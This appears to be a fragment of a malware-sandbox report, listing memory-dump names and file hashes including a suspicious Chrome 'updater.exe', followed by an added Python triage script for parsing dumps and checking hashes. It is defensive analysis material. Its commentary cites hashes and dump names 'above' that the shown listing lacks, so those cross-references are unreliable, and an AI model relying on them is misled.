memory/376-378-0x00000000002A0000-0x0000000000B0C000-memory.dmp

memory/5028-382-0x0000000072AE0000-0x00000000731CE000-memory.dmp

memory/4944-387-0x00007FFB7CDC0000-0x00007FFB7D7AC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4158e99cbe1e3ae856753bdb5aac59aa
SHA1 6475a9e8d6702a78dbbcb0d23d9545bab3d644cc
SHA256 fbaa696f4925f7587e5aec17bf0791a881a2075201c74b173ab4288538225636
SHA512 ecdab10f6b01627ebdbd112c52376ad755e8d50e72bf52a231fc16970a01fa0a3e01b452877f871edeb0d50cd15e5a48a73d9b3ef8c5c98a2d3f6ec9b71dfd59

C:\Program Files\Google\Chrome\updater.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

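Two checks an analyst wants before working from the listing above. First, the memory-dump names encode `<pid>-<sequence>-<start>-<end>`, so they can be parsed to see which regions each process holds, which ranges recur across several PIDs (almost always one shared module mapped into each of them) and which dump sits at the 32-bit default image base 0x400000, the natural first dump to open in a report that also flags SetThreadContext. Second, the hashes printed for `__PSScriptPolicyTest_rjcayeg3.j3j.ps1` are the MD5/SHA-1/SHA-256/SHA-512 of the one-byte string `1`, which is the probe file PowerShell itself writes at startup to test script policy, so that entry is host noise rather than an indicator. The script below is an added example and is not part of the sandbox output; `DUMP_LINES` is a constructed excerpt of the dump names above plus one malformed line, `REPORTED_PSPOLICY` copies the hashes shown in the report, and the image-base rule is a heuristic, not something the report asserts.

```python
# Added example (not part of the sandbox report): triage helpers for the
# artifact listing above. DUMP_LINES is a constructed excerpt of the report's
# memory-dump names; REPORTED_PSPOLICY copies the hashes the report shows for
# __PSScriptPolicyTest_rjcayeg3.j3j.ps1.
import hashlib
import re
from collections import defaultdict

DUMP_LINES = [
    "memory/4540-250-0x0000000004EC0000-0x0000000004ED5000-memory.dmp",
    "memory/4540-253-0x0000000004EC0000-0x0000000004ED5000-memory.dmp",
    "memory/1100-252-0x00007FF74E770000-0x00007FF74F6AD000-memory.dmp",
    "memory/4172-260-0x00007FFB8A7C0000-0x00007FFB8A99B000-memory.dmp",
    "memory/4540-272-0x0000000072AE0000-0x00000000731CE000-memory.dmp",
    "memory/5028-273-0x0000000000400000-0x000000000045A000-memory.dmp",
    "memory/5028-275-0x0000000072AE0000-0x00000000731CE000-memory.dmp",
    "memory/1100-285-0x00007FFB8A7C0000-0x00007FFB8A99B000-memory.dmp",
    "memory/376-292-0x00000000002A0000-0x0000000000B0C000-memory.dmp",
    "memory/376-300-0x00007FFB8A7C0000-0x00007FFB8A99B000-memory.dmp",
    "memory/1700-307-0x00007FFB7CDC0000-0x00007FFB7D7AC000-memory.dmp",
    "not-a-dump-line",  # constructed: exercises the reject path
]

# Name layout: memory/<pid>-<sequence>-0x<start>-0x<end>-memory.dmp
DUMP_RE = re.compile(
    r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp"
)


def parse_dump(name):
    """Return pid/seq/start/end/size for one dump name, or None if malformed."""
    m = DUMP_RE.fullmatch(name.strip())
    if m is None:
        return None
    pid, seq, start, end = m.groups()
    start, end = int(start, 16), int(end, 16)
    if end <= start:  # an empty or inverted range is not a usable dump
        return None
    return {"pid": int(pid), "seq": int(seq), "start": start, "end": end,
            "size": end - start}


def regions_by_pid(lines):
    """Distinct (start, end) ranges per PID; repeated dumps of one range collapse."""
    acc = defaultdict(set)
    for line in lines:
        d = parse_dump(line)
        if d:
            acc[d["pid"]].add((d["start"], d["end"]))
    return {pid: sorted(r) for pid, r in acc.items()}


def shared_regions(regions):
    """Ranges dumped from more than one PID: usually one module mapped into
    several processes, so a single copy is enough to examine (heuristic)."""
    owners = defaultdict(set)
    for pid, ranges in regions.items():
        for r in ranges:
            owners[r].add(pid)
    return {r: sorted(p) for r, p in owners.items() if len(p) > 1}


DEFAULT_IMAGE_BASE_32 = 0x400000  # default image base of a 32-bit PE (heuristic anchor)


def candidate_payload_dumps(regions):
    """Dumps that start at the 32-bit default image base; in a process that also
    shows SetThreadContext activity this is the first dump to open (heuristic)."""
    return [(pid, s, e) for pid, ranges in regions.items()
            for s, e in ranges if s == DEFAULT_IMAGE_BASE_32]


REPORTED_PSPOLICY = {  # hashes exactly as printed in the report above
    "md5": "c4ca4238a0b923820dcc509a6f75849b",
    "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
    "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
    "sha512": "4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b3"
              "7b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a",
}


def matches_reported(data, reported):
    """Per-algorithm check of candidate file content against the reported hashes."""
    return {alg: hashlib.new(alg, data).hexdigest() == digest
            for alg, digest in reported.items()}


if __name__ == "__main__":
    regs = regions_by_pid(DUMP_LINES)
    for pid, ranges in sorted(regs.items()):
        print(pid, [f"0x{s:X}-0x{e:X} ({e - s:#x} bytes)" for s, e in ranges])
    print("shared:", {f"0x{s:X}-0x{e:X}": p for (s, e), p in shared_regions(regs).items()})
    print("candidate payload dumps:", candidate_payload_dumps(regs))
    # The PowerShell policy-probe file's reported hashes are those of the one-byte content "1".
    print("__PSScriptPolicyTest content is b'1':", matches_reported(b"1", REPORTED_PSPOLICY))
```

Run against the full listing, the same parser collapses the many repeated `4540-...-0x4EC0000-0x4ED5000` entries to one 0x15000-byte range, shows `0x72AE0000-0x731CE000` shared by 4540 and 5028 and `0x7FFB8A7C0000-0x7FFB8A99B000` shared by 376, 1100 and 4172, and leaves the 0x400000-0x45A000 dump of PID 5028 as the single image-base candidate. The hash check is the same one to apply to any dropped file before it goes into an indicator list: recompute, compare, and drop entries whose content is a known benign constant.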